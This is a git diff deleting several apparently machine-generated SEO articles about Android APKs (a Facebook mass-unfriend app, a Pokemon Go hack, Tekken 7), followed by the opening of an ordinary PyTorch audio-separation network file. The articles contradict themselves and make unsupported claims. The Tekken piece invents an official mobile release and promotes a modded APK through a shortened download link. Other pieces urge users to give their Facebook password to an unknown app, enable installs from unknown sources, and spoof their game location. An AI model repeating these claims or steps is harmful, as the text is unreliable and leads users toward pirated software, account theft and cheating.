-These permissions are necessary for the app to function properly. However, you should be careful when granting permissions to any third-party app, as they may pose some security risks. You should also review your Facebook privacy settings and revoke any unwanted access from apps or websites.
-How to Use All Friends Remover for Facebook APK
-Using All Friends Remover for Facebook APK is very simple. Here are the steps:
-
-- Launch the app and log in with your Facebook email and password.
-- The app will show you a list of all your friends. You can scroll down to see more.
-- If you want to unfriend all your friends, tap on the "Select All" button at the top. If you want to unfriend some of your friends, tap on the checkboxes next to their names.
-- Once you have selected the friends you want to unfriend, tap on the "Unfriend" button at the bottom.
-- The app will ask you to confirm your action. Tap on "Yes" to proceed.
-- The app will start unfriending your selected friends. You can see the progress on the screen. Depending on the number of friends you have, this may take a few seconds or minutes.
-- When the app is done, it will show you a message saying "All Friends Removed Successfully". Tap on "OK" to exit.
-
-You can now check your Facebook account and see that your friends list is empty. You can also verify that the app has unfriended your friends by visiting their profiles and seeing that you are no longer connected. If you change your mind and want to add some of your friends back, you will need to send them a friend request again.
-Pros and Cons of All Friends Remover for Facebook APK
-All Friends Remover for Facebook APK is a handy app for anyone who wants to unfriend all their Facebook friends in a quick and easy way. However, like any other app, it has its pros and cons. Here are some of them:
-Pros
-
-- It saves you time and effort. You don't have to unfriend each friend individually, which can be very tedious and time-consuming.
-- It improves your privacy and security. You can reduce the amount of personal information that you share with your Facebook friends, who may not be trustworthy or respectful of your privacy. You can also avoid unwanted messages, notifications, or requests from your Facebook friends.
-- It declutters your social media. You can get rid of the people who don't add value to your life, who annoy you with their posts, or who you don't care about anymore. You can focus on the people who matter to you, or start fresh with a new account.
-
-Cons
-
-- It may cause some problems or misunderstandings. Some of your friends may not understand why you unfriended them, and may feel hurt or offended. They may think that you are angry with them, or that you don't like them anymore. They may also try to contact you or confront you about it.
-- It may affect your online reputation or relationships. Some of your friends may be important for your personal or professional life, and unfriending them may damage your reputation or relationships. For example, if you unfriend your boss, your co-workers, or your clients, they may think that you are unprofessional or disrespectful.
-- It may not be reversible or reliable. Once you unfriend someone on Facebook, you cannot undo it unless you send them a friend request again and they accept it. However, they may not accept it, or they may not even see it if they have blocked you or changed their settings. Also, the app may not work properly or may fail to unfriend some of your friends due to technical issues or errors.
-
-Alternatives to All Friends Remover for Facebook APK
-If you are looking for other ways to unfriend your Facebook friends, there are some alternatives to All Friends Remover for Facebook APK that you can try. Here are some of them:
-Facebook Unfriend Tool
-This is a Chrome extension that allows you to unfriend all your Facebook friends in one click. It works similarly to All Friends Remover for Facebook APK, but it requires a Chrome browser and a PC. You can download it from [Chrome Web Store].
-Friend Remover PRO - Delete All Friends
-This is another Chrome extension that allows you to unfriend all your Facebook friends in one click. It also has some additional features, such as filtering by gender, country, or activity level. You can download it from [Chrome Web Store].
-Unfriend All Friends For Facebook
-This is another Android app that allows you to unfriend all your Facebook friends in one click. It has a simple interface and a fast performance. You can download it from [APKPure].
-Conclusion
-All Friends Remover for Facebook APK is an Android app that allows you to unfriend all your Facebook friends in just two clicks. It is fast, easy to use, and reliable. It can help you save time and effort, as well as improve your privacy and security on Facebook. However, it also has some drawbacks and risks, such as causing problems or misunderstandings with your friends, affecting your online reputation or relationships, or not being reversible or reliable. Therefore, you should use it with caution and discretion. You should also consider some alternatives to All Friends Remover for Facebook APK, such as Facebook Unfriend Tool, Friend Remover PRO - Delete All Friends, or Unfriend All Friends For Facebook. These are some other apps or extensions that can help you unfriend your Facebook friends in one click, with some additional features or options.
-FAQs
-Here are some frequently asked questions about All Friends Remover for Facebook APK:
-Is All Friends Remover for Facebook APK safe to use?
-All Friends Remover for Facebook APK is generally safe to use, as it does not contain any malware or viruses. However, it is not developed or endorsed by Facebook, and it requires your login credentials and permissions to access your friends list and unfriend them. Therefore, you should be careful when using any third-party app that asks for your personal information or access to your account, as they may pose some security risks or violate Facebook's terms of service.
-Can I undo the unfriending action after using All Friends Remover for Facebook APK?
-No, you cannot undo the unfriending action after using All Friends Remover for Facebook APK. Once you unfriend someone on Facebook, you cannot add them back unless you send them a friend request again and they accept it. However, they may not accept it, or they may not even see it if they have blocked you or changed their settings. Therefore, you should think carefully before using All Friends Remover for Facebook APK, and make sure that you really want to unfriend all your friends.
-Will my friends know that I unfriended them using All Friends Remover for Facebook APK?
-No, your friends will not know that you unfriended them using All Friends Remover for Facebook APK. The app does not send any notification or message to your friends when you unfriend them. However, they may notice that you are no longer on their friends list, or that they cannot see your posts or profile anymore. They may also try to visit your profile and see that you are no longer connected. Therefore, they may figure out that you unfriended them, and they may feel hurt or offended by your action.
-Will All Friends Remover for Facebook APK delete my Facebook account?
-No, All Friends Remover for Facebook APK will not delete your Facebook account. The app only removes your friends from your account, but it does not affect any other aspect of your account. You can still use your account normally after using the app, and you can still add new friends if you want to. However, if you want to delete your account completely, you will need to do it manually from the Facebook settings.
-How can I contact the developer of All Friends Remover for Facebook APK?
-The developer of All Friends Remover for Facebook APK is unknown, and there is no official website or contact information for the app. The app is distributed by third-party sources, such as [APKCombo], which do not provide any support or warranty for the app. Therefore, if you have any questions or issues with the app, you may not be able to contact the developer or get any help.
-
-
\ No newline at end of file
diff --git a/spaces/1phancelerku/anime-remove-background/Download Pokemon GO Hack APK and Catch Them All with Ease.md b/spaces/1phancelerku/anime-remove-background/Download Pokemon GO Hack APK and Catch Them All with Ease.md
deleted file mode 100644
index b1e5f81a19ed460b88f863cc98900718093bad34..0000000000000000000000000000000000000000
--- a/spaces/1phancelerku/anime-remove-background/Download Pokemon GO Hack APK and Catch Them All with Ease.md
+++ /dev/null
@@ -1,115 +0,0 @@
-
-How to Download Hack Pokemon Go APK
-Pokemon Go is a popular mobile game that uses augmented reality to let you catch, train, and battle virtual creatures in the real world. The game has millions of fans around the world who enjoy exploring new places, collecting items, and joining raids with other players. But what if you want to have an edge over your rivals and access more features and benefits in the game? That's where Pokemon Go hack APK comes in.
-Pokemon Go hack APK is a modified version of the original game that allows you to cheat and bypass some of the game's limitations. With this hack, you can teleport to any location, use a joystick to move around, auto-walk to hatch eggs, catch rare and legendary Pokemon, get unlimited items and coins, and more. Sounds tempting, right? But before you download and install Pokemon Go hack APK, you should be aware of the risks and dangers involved, as well as the legal issues that may arise from using it. In this article, we will explain everything you need to know about Pokemon Go hack APK, including its features, tips and tricks, risks and dangers, and legal issues.
- Features of Pokemon Go Hack APK
-Pokemon Go hack APK has many features that can enhance your gaming experience and make you a better trainer. Here are some of the most notable ones:
-Teleport, joystick, and auto-walk
-One of the main features of Pokemon Go hack APK is that it allows you to teleport to any location in the world without actually moving. This means you can catch Pokemon that are exclusive to certain regions, visit PokeStops and gyms that are far away, and participate in events that are not available in your area. You can also use a joystick to move around the map without walking, which can save you time and energy. And if you want to hatch eggs without moving a muscle, you can use the auto-walk feature that will make your character walk automatically.
-Catch rare and legendary Pokemon
-Another feature of Pokemon Go hack APK is that it enables you to catch rare and legendary Pokemon that are normally hard to find or require special conditions to appear. For example, you can catch Mewtwo, Lugia, Ho-Oh, Rayquaza, Giratina, Kyurem, and other powerful Pokemon that are usually only available in raids or special events. You can also catch shiny Pokemon that have different colors than normal ones. With this hack, you can fill up your Pokedex faster and easier than ever.
-Get unlimited items and coins
-A third feature of Pokemon Go hack APK is that it gives you unlimited items and coins that you can use in the game. Items include Poke Balls, berries, potions, revives, incense, lures, lucky eggs, incubators, raid passes, etc. Coins are the in-game currency that you can use to buy items or upgrade your storage space. With this hack, you don't have to worry about running out of items or coins or spending real money on them.
- Tips and Tricks for Playing Pokemon Go Hack APK
-Pokemon Go hack APK can make your game more fun and exciting, but you should also be careful and smart when using it. Here are some tips and tricks that can help you play Pokemon Go hack APK safely and effectively:
-Delete difficult tasks and claim rewards one by one
-One of the tips for playing Pokemon Go hack APK is to delete the tasks that are too hard or time-consuming to complete, such as catching a certain number of Pokemon, walking a certain distance, or battling in a gym. You can do this by tapping on the bin icon next to the task in the Today or Field section of the game. This will free up space for new tasks that may be easier or more rewarding. You can also claim the rewards for each task one by one, instead of claiming them all at once. This will prevent you from getting banned or detected by the game's anti-cheat system, as it will look more natural and realistic.
-Save Stardust and build XP with Lucky Eggs
-Another tip for playing Pokemon Go hack APK is to save your Stardust and use it wisely. Stardust is a valuable resource that you need to power up and evolve your Pokemon. You can get Stardust by catching Pokemon, hatching eggs, completing tasks, participating in raids, etc. However, you should not spend it on every Pokemon you catch, as some of them may not be worth it or may be replaced by better ones later. You should only use Stardust on the Pokemon that have high IVs (individual values), high CP (combat power), and useful movesets. You can check these stats by using an app like Poke Genie or Calcy IV. You should also use Lucky Eggs to boost your XP (experience points) and level up faster. Lucky Eggs are items that double your XP for 30 minutes. You can get them by leveling up, completing tasks, or buying them with coins. You should use Lucky Eggs when you have a lot of Pokemon to evolve, as each evolution gives you 500 XP (or 1000 XP with a Lucky Egg). You can also use Lucky Eggs when you participate in raids, catch rare Pokemon, or complete special tasks.
-Throw Pokeballs correctly and catch legendary Pokemon
-A third tip for playing Pokemon Go hack APK is to throw your Pokeballs correctly and catch legendary Pokemon. Throwing Pokeballs is an art that requires skill and practice. You should aim for the center of the circle that appears around the Pokemon, as this will increase your chances of hitting it and catching it. You should also try to throw curveballs, which are balls that spin in the air before landing. Curveballs give you a bonus XP and increase your catch rate. You can throw curveballs by spinning the ball in a circular motion before releasing it. You should also use different types of balls depending on the difficulty of the Pokemon. For example, you should use Great Balls or Ultra Balls for rare or strong Pokemon, and Master Balls for legendary Pokemon. Legendary Pokemon are the most powerful and sought-after Pokemon in the game. They include Mewtwo, Lugia, Ho-Oh, Rayquaza, Giratina, Kyurem, etc. You can catch legendary Pokemon by participating in raids or using the teleport feature of Pokemon Go hack APK. However, you should be careful when doing so, as legendary Pokemon are very hard to catch and may flee if you fail.
- Risks and Dangers of Playing Pokemon Go Hack APK
-Pokemon Go hack APK may sound like a dream come true for many players, but it also comes with many risks and dangers that you should be aware of. Here are some of the most common ones:
-Accidents and injuries
-One of the risks of playing Pokemon Go hack APK is that it may cause accidents and injuries to yourself or others. Even though you are using a hack that allows you to teleport or move around without walking, you still need to pay attention to your surroundings and be careful where you go. You may encounter obstacles, hazards, or dangers that may harm you or others. For example, you may trip over a curb, fall down a flight of stairs, bump into a wall, step into a busy street, or enter a restricted area. You may also damage your device or lose your internet connection if you go to places with poor signal or coverage. To avoid these risks, always watch where you are going, follow traffic rules, respect property rights, and stay alert and aware.
-Muggings and trespassing
-Another risk of playing Pokemon Go hack APK is that it may expose you to muggings and trespassing. Even though you are using a hack that allows you to catch rare and legendary Pokemon without traveling far away, you still need to be careful about your personal safety and security. You may attract unwanted attention or suspicion from other people who may see you playing the game or holding your device. You may also encounter criminals or scammers who may try to rob you, hack you, or trick you into giving them your personal information or money. For example, you may be lured into a trap, followed by a stranger, offered a fake deal, or sent a phishing link. To avoid these risks, you should always play in public and well-lit places, avoid shady or unfamiliar areas, keep your device and account secure, and report any suspicious or illegal activity.
-Privacy and data breaches
-A third risk of playing Pokemon Go hack APK is that it may compromise your privacy and data. Even though you are using a hack that allows you to spoof your location and access more features and benefits in the game, you still need to be wary of the potential consequences of doing so. You may violate the terms of service and privacy policy of the game, which may result in your account being banned or deleted. You may also expose your personal information and data to third parties who may use it for malicious purposes. For example, you may reveal your real location, identity, contacts, preferences, habits, etc. You may also download malware or viruses that may harm your device or steal your data. To avoid these risks, you should always read and understand the terms and conditions and privacy policy of the game, use a VPN (virtual private network) or a burner email to hide your IP address and identity, and scan your device and files for any threats.
- Legal Issues of Playing Pokemon Go Hack APK
-Pokemon Go hack APK may not only pose risks and dangers to yourself and others, but it may also raise legal issues that you should be aware of. Here are some of the most common ones:
-Liability for personal injury and property damage
-One of the legal issues of playing Pokemon Go hack APK is that it may make you liable for personal injury and property damage that you or others may cause or suffer while playing the game. Even though you are using a hack that allows you to teleport or move around without walking, you still need to be responsible for your actions and behavior. You may injure yourself or others, or damage someone else's property, as a result of playing the game. For example, you may crash into a car, hit a pedestrian, break a window, knock over a vase, etc. You may also be sued by the injured party or the property owner for compensation or damages. To avoid these legal issues, you should always follow the law and respect the rights of others, avoid causing harm or damage to anyone or anything, and have insurance or funds to cover any potential liability.
-Intellectual property infringement and piracy
-Another legal issue of playing Pokemon Go hack APK is that it may constitute intellectual property infringement and piracy. Intellectual property refers to creations of the mind, such as inventions, designs, logos, and names. Piracy refers to the unauthorized use or distribution of someone else's intellectual property without their permission. Pokemon Go hack APK is a modified version of the original game, which belongs to Niantic Inc., The Pokemon Company, and Nintendo Co., Ltd. By downloading and installing Pokemon Go hack APK, you are infringing their intellectual property rights and engaging in piracy, which may result in legal action or penalties. For example, you may be sued for damages, fined, or even jailed. You may also be banned or blocked from accessing the game or its services. To avoid these legal issues, respect the intellectual property rights of the game's developers and owners, and only use the official version of the game that they have authorized and licensed.
-Augmented reality regulation and virtual currency taxation
-A third legal issue of playing Pokemon Go hack APK is that it may involve augmented reality regulation and virtual currency taxation. Augmented reality refers to the technology that overlays digital information or images on the physical world, such as Pokemon Go. Virtual currency refers to the digital money that is used in online games or platforms, such as coins in Pokemon Go. Both augmented reality and virtual currency are relatively new and emerging phenomena that may not have clear or consistent laws or regulations in different countries or jurisdictions. By playing Pokemon Go hack APK, you may be subject to different rules or requirements that may affect your rights and obligations. For example, you may need a permit or license to use augmented reality in certain places or situations, or you may need to pay taxes on your virtual currency transactions or income. To avoid these legal issues, you should be aware of and comply with the laws and regulations that apply to augmented reality and virtual currency in your location or destination.
- Conclusion
-Pokemon Go hack APK is a tempting option for many players who want to enjoy more features and benefits in the game. However, it also comes with many risks and dangers that may harm yourself or others, as well as legal issues that may result in serious consequences. Therefore, you should think twice before downloading and installing Pokemon Go hack APK, and weigh the pros and cons carefully. You should also follow the tips and tricks that we have provided to play Pokemon Go hack APK safely and effectively. Remember, Pokemon Go is a game that is meant to be fun and fair for everyone, so don't ruin it for yourself or others by cheating or hacking.
- FAQs
-Here are some of the frequently asked questions about Pokemon Go hack APK:
-Q: Where can I download Pokemon Go hack APK?
-A: You can download Pokemon Go hack APK from various websites or sources online, but you should be careful and cautious when doing so. Some of these websites or sources may be unreliable, untrustworthy, or illegal, and may contain malware or viruses that may harm your device or data. You should only download Pokemon Go hack APK from reputable and verified websites or sources that have positive reviews and feedback from other users.
-Q: How can I install Pokemon Go hack APK?
-A: You can install Pokemon Go hack APK by following these steps:
-
-- Download the Pokemon Go hack APK file from a reliable and verified website or source.
-- Go to your device's settings and enable the option to install apps from unknown sources.
-- Locate the downloaded file in your device's storage and tap on it to start the installation process.
-- Follow the instructions on the screen and grant the necessary permissions to the app.
-- Wait for the installation to finish and launch the app.
-
-Q: How can I update Pokemon Go hack APK?
-A: You can update Pokemon Go hack APK by following these steps:
-
-- Go to the website or source where you downloaded the Pokemon Go hack APK file and check if there is a new version available.
-- If there is a new version available, download it to your device.
-- Uninstall the old version of Pokemon Go hack APK from your device.
-- Install the new version of Pokemon Go hack APK by following the same steps as above.
-
-Q: Is Pokemon Go hack APK safe?
-A: No, Pokemon Go hack APK is not safe. It may cause accidents and injuries to yourself or others, expose you to muggings and trespassing, compromise your privacy and data, violate the terms of service and privacy policy of the game, infringe and pirate the intellectual property rights of the game developers and owners, and subject you to different laws and regulations regarding augmented reality and virtual currency. It may also result in your account being banned or deleted by the game's anti-cheat system. Therefore, you should avoid using Pokemon Go hack APK at all costs.
-Q: Is there a legal way to play Pokemon Go with more features and benefits?
-A: Yes, there is a legal way to play Pokemon Go with more features and benefits without using Pokemon Go hack APK. You can do this by following these steps:
-
-- Download and install the official version of Pokemon Go from the Google Play Store or the Apple App Store.
-- Create an account and choose your avatar and team.
-- Start playing the game by exploring your surroundings, catching Pokemon, collecting items, joining raids, etc.
-- Earn coins by defending gyms or completing tasks, and use them to buy items or upgrade your storage space.
-- Join a community of Pokemon Go players online or offline, and share tips, tricks, news, events, etc.
-- Participate in special events and promotions that may offer more features and benefits, such as discounts, bonuses, rewards, etc.
-
-By playing Pokemon Go legally, you can enjoy the game more and avoid the risks and dangers of Pokemon Go hack APK. You can also support the game developers and owners who work hard to create and maintain the game for you.
-
-
\ No newline at end of file
diff --git a/spaces/1phancelerku/anime-remove-background/Download Tekken 7 APK and Enjoy the Best Fighting Experience on Android.md b/spaces/1phancelerku/anime-remove-background/Download Tekken 7 APK and Enjoy the Best Fighting Experience on Android.md
deleted file mode 100644
index 3bdbb5e27fb7e43f11bfbdaf2fc3162c860f2f6f..0000000000000000000000000000000000000000
--- a/spaces/1phancelerku/anime-remove-background/Download Tekken 7 APK and Enjoy the Best Fighting Experience on Android.md
+++ /dev/null
@@ -1,123 +0,0 @@
-
-Tekken 7 Download Android: How to Play the Ultimate Fighting Game on Your Smartphone
-If you are a fan of fighting games, you have probably heard of Tekken, one of the most iconic and successful franchises in the genre. The latest installment, Tekken 7, is a masterpiece of action-packed, cinematic, and competitive gameplay that will keep you hooked for hours.
-tekken 7 download android
Download File ⏩ https://jinyurl.com/2uNTpX
-But did you know that you can also play Tekken 7 on your Android device? Yes, you read that right. You can enjoy the thrill of Tekken 7 anytime, anywhere, on your smartphone or tablet. In this article, we will show you how to download and install Tekken 7 for Android, how to play it like a pro, and how to enjoy it to the fullest.
-What is Tekken 7?
-Tekken 7 is a fighting game developed by Bandai Namco Studios and published by Bandai Namco Entertainment. It is the ninth main entry in the Tekken series, which started in 1994 as an arcade game.
-Tekken 7 follows the story of the Mishima clan, a powerful family that is involved in a long-running feud over control of the world. The game features over 50 characters from different countries and backgrounds, each with their own fighting style, personality, and motivation. Some of them are new to the series, such as Akuma from Street Fighter, while others are returning favorites, such as Jin Kazama, Nina Williams, and King.
-Tekken 7 was released for arcade machines in Japan in March 2015, and later received updates that added new characters, stages, modes, and features. The game was ported to PlayStation 4, Xbox One, and Windows PC in June 2017, and received positive reviews from critics and players alike. The game has sold over 7 million copies worldwide as of March 2021, making it one of the best-selling fighting games of all time.
-What are the Features of Tekken 7?
-Stunning Graphics and Cinematics
-One of the most impressive aspects of Tekken 7 is its graphics and cinematics, which are powered by Unreal Engine 4. The game boasts realistic and detailed character models, animations, and environments, as well as dynamic lighting and shadows, particle effects, and reflections. The game also features seamless transitions between gameplay and cutscenes, creating a cinematic experience that immerses you in the story and the action.
-Diverse and Customizable Roster
-Another feature that makes Tekken 7 stand out is its diverse and customizable roster of fighters. The game offers over 50 characters to choose from, each with their own unique moves, combos, strengths, and weaknesses. You can also customize your characters with various outfits, accessories, hairstyles, tattoos, and more, to express your personality and style. You can even create your own original characters using the Character Creation mode, which lets you mix and match different parts and features from existing characters.
-Innovative and Accessible Combat System
-The core of Tekken 7 is its innovative and accessible combat system, which is designed to appeal to both casual and hardcore fans of fighting games. The game introduces new mechanics and modes that add depth and variety to the gameplay, such as:
-
-- Rage Art: A powerful attack that can be activated when your health is low, allowing you to deal massive damage and turn the tide of the battle.
-- Power Crush: A special move that can absorb incoming attacks and continue with your own, giving you an advantage in offensive situations.
-- Frame Data Display: An optional feature that shows you the frame data of each move, such as startup, recovery, advantage, and disadvantage, helping you to improve your skills and strategies.
-- Online Battles: A mode that lets you compete with other players from around the world in ranked or casual matches, or join online tournaments with up to eight participants.
-
-How to Download Tekken 7 for Android?
-Tekken 7 Apk Download for Android (Latest Version) 2022
-If you want to play Tekken 7 on your Android device without any restrictions or limitations, you can download the Tekken 7 apk file from a reliable source. This is a modified version of the game that allows you to enjoy all the features and content of the original game on your smartphone or tablet. To download and install the Tekken 7 apk file for Android, follow these steps:
-
-- Go to the website where you can download the Tekken 7 apk file, and click on the download button.
-- Wait for the download to finish, and then locate the file on your device.
-- Before installing the file, make sure that you have enabled the option to install apps from unknown sources in your device settings.
-- Tap on the file to start the installation process, and follow the instructions on the screen.
-- Once the installation is complete, launch the game and enjoy playing Tekken 7 on your Android device.
-
-The benefits of using this method are:
-
-- You can play Tekken 7 on your Android device without any internet connection or data usage.
-- You can access all the characters, stages, modes, and features of Tekken 7 without any restrictions or in-app purchases.
-- You can customize your game settings according to your preferences and device performance.
-
Tekken 7 Mobile Download for Android (Official Version) 2022
-If you prefer to play the official version of Tekken 7 on your Android device, you can download the Tekken 7 mobile app from the Google Play Store. This is a simplified and optimized version of the game that is designed to run smoothly on mobile devices. To download and install the Tekken 7 mobile app for Android, follow these steps:
-
-- Go to the Google Play Store on your device, and search for Tekken 7.
-- Select the app from the list of results, and tap on the install button.
-- Wait for the app to download and install on your device.
-- Launch the app and sign in with your Bandai Namco account or create a new one.
-- Start playing Tekken 7 on your Android device.
-
-The features and limitations of this version are:
-
-- You need an internet connection and data usage to play Tekken 7 on your Android device.
-- You have limited access to some of the characters, stages, modes, and features of Tekken 7, and you need to unlock them with in-app purchases or by completing missions.
-- You have to adjust your game settings according to the default options and device compatibility.
-
-How to Play Tekken 7 on Android?
-Tips and Tricks for Beginners
-If you are new to Tekken 7 or fighting games in general, you might feel overwhelmed by the complexity and difficulty of the game. But don't worry, we have some tips and tricks for beginners that will help you get started and improve your skills. Here are some of them:
-
-- Learn the moves: The first thing you need to do is to learn the basic moves of each character, such as punches, kicks, throws, blocks, and dodges. You can find the move list in the pause menu or in the training mode. You can also watch some tutorials or guides online that will teach you how to perform each move and when to use them.
-- Practice in training mode: The best way to practice your moves and combos is to use the training mode, which lets you choose any character, stage, and opponent. You can also customize the settings, such as the difficulty, health, and behavior of the opponent. You can also use the frame data display feature to see how each move works and how to counter them.
-- Adjust the settings: Another thing you need to do is to adjust the game settings according to your preferences and device performance. You can change the graphics quality, sound volume, control layout, camera angle, and more. You can also enable or disable some features, such as auto-combo, rage art, power crush, and frame data display.
-
Tips and Tricks for Advanced Players
-If you are already familiar with Tekken 7 or fighting games in general, you might want to take your skills to the next level and challenge yourself with more advanced techniques and strategies. Here are some tips and tricks for advanced players that will help you master the game and dominate your opponents:
-
-- Master the combos: The key to winning in Tekken 7 is to execute powerful and effective combos that can deal a lot of damage and stun your opponent. You can learn the combos of each character from the move list, the training mode, or online sources. You can also create your own combos by combining different moves and experimenting with different timings and distances.
-- Use the frame data: One of the most useful features of Tekken 7 is the frame data display, which shows you the frame data of each move, such as startup, recovery, advantage, and disadvantage. You can use this information to understand how each move works and how to counter it, and to find openings, punish mistakes, and create pressure (see the toy example after this list).
-- Join online tournaments: One of the most exciting and rewarding ways to play Tekken 7 is to join online tournaments, which let you compete with other players from around the world in ranked or casual matches. You can also create your own tournaments with up to eight participants. You can earn rewards, rankings, and trophies by participating in online tournaments, as well as improve your skills and reputation.
-
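As a toy illustration of how to read that frame data, the sketch below checks whether a blocked move can be punished. The rule is simplified and the numbers are invented for illustration; they are not real Tekken 7 frame data.

```python
# Simplified reading of frame data: a move that is blocked and leaves its
# user at -N frames can be punished by any counter whose startup is N frames
# or less. All numbers here are made up for illustration.
def can_punish(block_advantage: int, punish_startup: int) -> bool:
    """True if a move with `punish_startup` frames of startup connects after block."""
    return punish_startup <= -block_advantage

print(can_punish(block_advantage=-13, punish_startup=10))  # True: a 10f move punishes -13
print(can_punish(block_advantage=-9, punish_startup=10))   # False: -9 is safe against 10f moves
```

The same idea, read off the in-game frame display, tells you which of your own moves are safe to throw out and which of your opponent's moves you should be punishing on block.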
-How to Enjoy Tekken 7 on Android?
-Review and Rating of Tekken 7
-Tekken 7 is widely regarded as one of the best fighting games ever made, and it has received rave reviews from critics and players alike. The game has an average score of 82 out of 100 on Metacritic, based on 91 reviews from various sources. The game has also received a user score of 8.1 out of 10 on Metacritic, based on 1,028 ratings from players.
-Some of the praises that Tekken 7 has received are:
-
-- "Tekken 7 is a hallmark fighting game that's both accessible and highly technical, offering a diverse cast of characters and a robust suite of modes." - IGN
-- "Tekken 7 is one of the most fun fighting games I've ever played. It's fast-paced, flashy, strategic, and satisfying." - Game Informer
-- "Tekken 7 is a fantastic fighting game experience that offers something for everyone." - GamesRadar+
-
-Comparison with Other Fighting Games on Android
-Tekken 7 is not the only fighting game that you can play on your Android device. There are many other fighting games available on the Google Play Store that offer different features, styles, and experiences. Here are some of the most popular fighting games on Android that you can compare with Tekken 7:

| Game | Features | Pros | Cons |
| --- | --- | --- | --- |
| Street Fighter IV Champion Edition | Classic 2D fighting game with 32 characters from the Street Fighter series; three control options (virtual pad, arcade stick, or Bluetooth controller); online multiplayer with cross-platform support; arcade, training, survival, and challenge modes; customizable graphics settings. | Smooth and responsive gameplay; iconic and diverse characters; high replay value; great sound effects and music. | Requires an internet connection; some characters require in-app purchases; no story mode; occasional lag and connection issues. |
| Mortal Kombat | Brutal 3D fighting game with over 130 characters from the Mortal Kombat universe; Fatalities, X-Rays, and Brutalities for each character; online multiplayer with faction wars, team battles, and leaderboards; story, tower, challenge, and relic hunt modes; customizable equipment and abilities for each character. | Stunning graphics and animations; intense and visceral combat; engaging and immersive story; generous rewards and content. | Requires an internet connection; high device requirements; frequent updates and patches; grindy and pay-to-win aspects. |
| Injustice 2 | Superhero 3D fighting game with over 40 characters from the DC Comics universe; Super Moves, Special Attacks, and a Gear System for each character; online multiplayer with arena battles, leagues, raids, and chat; story, operations, challenges, and events modes; customizable graphics settings. | Impressive graphics and cinematics; fun and varied gameplay; rich and compelling story; lots of modes and features. | Requires an internet connection; high device requirements; long loading times; expensive and limited in-app purchases. |

-As you can see, each game has its own strengths and weaknesses, and it ultimately depends on your personal preference and taste. However, we believe that Tekken 7 is the best fighting game on Android, because it offers a balanced and satisfying experience that combines stunning graphics, diverse characters, innovative combat, and online tournaments.
-Conclusion
-Tekken 7 is a game that every fighting game fan should play, especially on their Android device. It is a game that delivers on every aspect, from the graphics and cinematics, to the characters and combat, to the modes and features. It is a game that will challenge you, entertain you, and inspire you.
-If you want to play Tekken 7 on your Android device, you have two options: you can download the Tekken 7 apk file from a reliable source, or you can download the official Tekken 7 mobile app from the Google Play Store. Either way, you will be able to enjoy the ultimate fighting game on your smartphone or tablet.
-So what are you waiting for? Download Tekken 7 for Android today, and unleash your inner fighter!
-FAQs
-Here are some of the frequently asked questions about Tekken 7 download android:
-
-- Q: Is Tekken 7 free to play on Android?
A: Yes, both the Tekken 7 apk file and the official Tekken 7 mobile app are free to download and play on Android devices. However, some characters, stages, modes, and features may require in-app purchases or unlocking by completing missions.
-- Q: Is Tekken 7 safe to download on Android?
A: Yes, as long as you download the Tekken 7 apk file or the official Tekken 7 mobile app from a reliable and trusted source. You should also scan the file or app with an antivirus software before installing it on your device.
-- Q: Is Tekken 7 compatible with my Android device?
A: The Tekken 7 apk file is compatible with most Android devices that have at least 2 GB of RAM and 4 GB of storage space. The official Tekken 7 mobile app is compatible with Android devices that have at least Android 5.0 (Lollipop) and 1 GB of RAM.
-- Q: How can I update Tekken 7 on my Android device?
A: If you downloaded the Tekken 7 apk file, you will need to download the latest version of the file from the same source and install it over the existing one. If you downloaded the official Tekken 7 mobile app, you will need to update it from the Google Play Store when a new version is available.
-- Q: How can I contact the developers of Tekken 7?
A: If you have any questions, feedback, or issues regarding Tekken 7, you can contact the developers of Tekken 7 by visiting their official website, their Facebook page, their Twitter account, or their YouTube channel.
-
-
-
\ No newline at end of file
diff --git a/spaces/801artistry/RVC801/infer/lib/uvr5_pack/lib_v5/nets_new.py b/spaces/801artistry/RVC801/infer/lib/uvr5_pack/lib_v5/nets_new.py
deleted file mode 100644
index 1c0f4fa96d921e979fe31bd4151701b7783fbcea..0000000000000000000000000000000000000000
--- a/spaces/801artistry/RVC801/infer/lib/uvr5_pack/lib_v5/nets_new.py
+++ /dev/null
@@ -1,133 +0,0 @@
-import torch
-import torch.nn.functional as F
-from torch import nn
-
-from . import layers_new
-
-
-class BaseNet(nn.Module):
- def __init__(
- self, nin, nout, nin_lstm, nout_lstm, dilations=((4, 2), (8, 4), (12, 6))
- ):
- super(BaseNet, self).__init__()
- self.enc1 = layers_new.Conv2DBNActiv(nin, nout, 3, 1, 1)
- self.enc2 = layers_new.Encoder(nout, nout * 2, 3, 2, 1)
- self.enc3 = layers_new.Encoder(nout * 2, nout * 4, 3, 2, 1)
- self.enc4 = layers_new.Encoder(nout * 4, nout * 6, 3, 2, 1)
- self.enc5 = layers_new.Encoder(nout * 6, nout * 8, 3, 2, 1)
-
- self.aspp = layers_new.ASPPModule(nout * 8, nout * 8, dilations, dropout=True)
-
- self.dec4 = layers_new.Decoder(nout * (6 + 8), nout * 6, 3, 1, 1)
- self.dec3 = layers_new.Decoder(nout * (4 + 6), nout * 4, 3, 1, 1)
- self.dec2 = layers_new.Decoder(nout * (2 + 4), nout * 2, 3, 1, 1)
- self.lstm_dec2 = layers_new.LSTMModule(nout * 2, nin_lstm, nout_lstm)
- self.dec1 = layers_new.Decoder(nout * (1 + 2) + 1, nout * 1, 3, 1, 1)
-
- def __call__(self, x):
- e1 = self.enc1(x)
- e2 = self.enc2(e1)
- e3 = self.enc3(e2)
- e4 = self.enc4(e3)
- e5 = self.enc5(e4)
-
- h = self.aspp(e5)
-
- h = self.dec4(h, e4)
- h = self.dec3(h, e3)
- h = self.dec2(h, e2)
- h = torch.cat([h, self.lstm_dec2(h)], dim=1)
- h = self.dec1(h, e1)
-
- return h
-
-
-class CascadedNet(nn.Module):
- def __init__(self, n_fft, nout=32, nout_lstm=128):
- super(CascadedNet, self).__init__()
-
- self.max_bin = n_fft // 2
- self.output_bin = n_fft // 2 + 1
- self.nin_lstm = self.max_bin // 2
- self.offset = 64
-
- self.stg1_low_band_net = nn.Sequential(
- BaseNet(2, nout // 2, self.nin_lstm // 2, nout_lstm),
- layers_new.Conv2DBNActiv(nout // 2, nout // 4, 1, 1, 0),
- )
-
- self.stg1_high_band_net = BaseNet(
- 2, nout // 4, self.nin_lstm // 2, nout_lstm // 2
- )
-
- self.stg2_low_band_net = nn.Sequential(
- BaseNet(nout // 4 + 2, nout, self.nin_lstm // 2, nout_lstm),
- layers_new.Conv2DBNActiv(nout, nout // 2, 1, 1, 0),
- )
- self.stg2_high_band_net = BaseNet(
